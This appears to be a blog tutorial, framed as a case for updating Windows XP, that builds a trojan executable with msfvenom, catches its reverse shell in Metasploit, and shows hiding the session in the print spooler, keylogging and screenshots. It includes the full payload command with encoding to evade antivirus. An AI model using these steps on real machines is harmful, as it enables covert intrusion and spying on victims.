Don't click that file! How to hack Windows XP SP3 with an msfvenom payload

LEGAL DISCLAIMER: This "hack" has been performed by using virtual machines running on my own computer. Don't use it against other people's systems, unless you've been given explicit written permission by their owners. I'm not responsible for any unintended use of these instructions.

A bunch of people on Quora keep asking me why it's so important to keep your system up-to-date.

They think if they keep using Windows XP, they're fine.

This post answers their questions better than any words.

Kali Linux includes a tool, called msfvenom, allowing to realize a custom payload for you to hack into a victim machine.

In my case, I created an infected executable that, when clicked, opens up a reverse shell on the victim machine or, in other words, an invisible backdoor.

I had to get familiar with this new tool, which replaces msfpayload (by now discontinued).

I tried to inject this payload in a Windows 7 virtual machine, but my attempts were unsuccessful. When I double-clicked the infected file, it didn't do anything and triggered Windows Error Reporting.

After checking the error logs, I found out this is due to the fact it's an unsigned software, so Windows doesn't allow you to run it. Maybe UAC has something to do with this problem.

I performed the same hack on Windows XP SP3 and I got in in a fraction of a second.

Executable creation

I realized an infected executable with this command:

msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=(IP address of the Kali Linux machine) LPORT=443 -f exe > letmein.exe

The command selects the windows/meterpreter/reverse_tcp payload, which opens a shell on the victim machine.

Afterward, it selects the X86 architecture (32-bit) and tries to encode the infected executable for 5 times with a specific encoder (shikata_ga_nai) for it to be harder to detect.

Then it defines the IP of the attacking machine and its listening port (443, which is the HTTPS port).

The command creates a file called letmein.exe.

Payload preparation

After creating the executable file, I had to prepare the exploit.

Once started msfconsole, I used the following exploit: multi/handler, by setting its payload to windows/meterpreter/reverse_tcp and configuring its options as follows:

(NOTE: LHOST and LPORT in the above screenshot are referred to the IP address of the attacking machine, i.e. my Kali Linux virtual machine, and to the chosen port to be opened on said machine. In fact, they stand for listening host and listening port)

Exploitation preparation

I double-clicked letmein.exe on the victim machine and, at the same time, I launched the exploit from the attacking machine by entering the exploit command.

After a couple of seconds, I was already in.

You can see from the above screenshot that meterpreter opened up a session on port 1071 on the victim machine and has sent it back to the attacking machine, listening on port 443.

At this point, I was good to go, as my account was the system administrator on the machine (as it happens to most Windows home and small company users).

You can check your privilege level by running "getuid".

The first thing I did was to migrate the session to another process so Task Manager wouldn't show anything suspicious. I chose the printer spooler process for that.

For you to do that, you need the list of running processes on the victim machine, returned by the ps command, which shows the process ID (PID) for each one of them.

The command migrate PID will do the trick.

Exploitation

For more details about this stage, check the embedded video.

Here I'm going to describe the most important results only, due to time constraints.

• Keystroke recording: I could record the keystrokes on the victim machine, thanks to keyscan_start and keyscan_dump commands.

• Desktop screenshot: I took a screenshot of my victim machine's desktop.

• Creation of files on the victim machine: by opening up a shell on the victim machine (shell command), I could create a text file on the desktop calling it Hacked by M@tt. I know it sounds script kiddie-ish, but it's nonetheless fun.

Wrap-up

Running an outdated operating system such as Windows XP is a very bad idea.

In fact, I could hack in the victim machine in a fraction of a second, after double-clicking the infected file.

This exploit didn't succeed at all in Windows 7 so far, but I'm gonna keep trying.

It has to be noted that this exploit was facilitated by two factors:

1. Administrative privileges on the machine: my account was the system administrator on the machine. If this weren't the case, I'd have to perform a privilege escalation.
2. No antivirus software installed: This is the default setup in Windows XP and I didn't install anything, as I'd just created the virtual machine. However, not all antivirus programs are created equal. In fact, by uploading the letmein.exe file to Virus Total, I noticed a 39/56 detection rate. I'd have maybe had better results by increasing the number of iterations when I created the payload.

I loved Windows XP and I believe it's maybe been the best Windows version, but it's time for the world to move away from it.

If you guys want to have a similar feeling to your operating system, you can use Linux Zorin.

Much more modern and secure.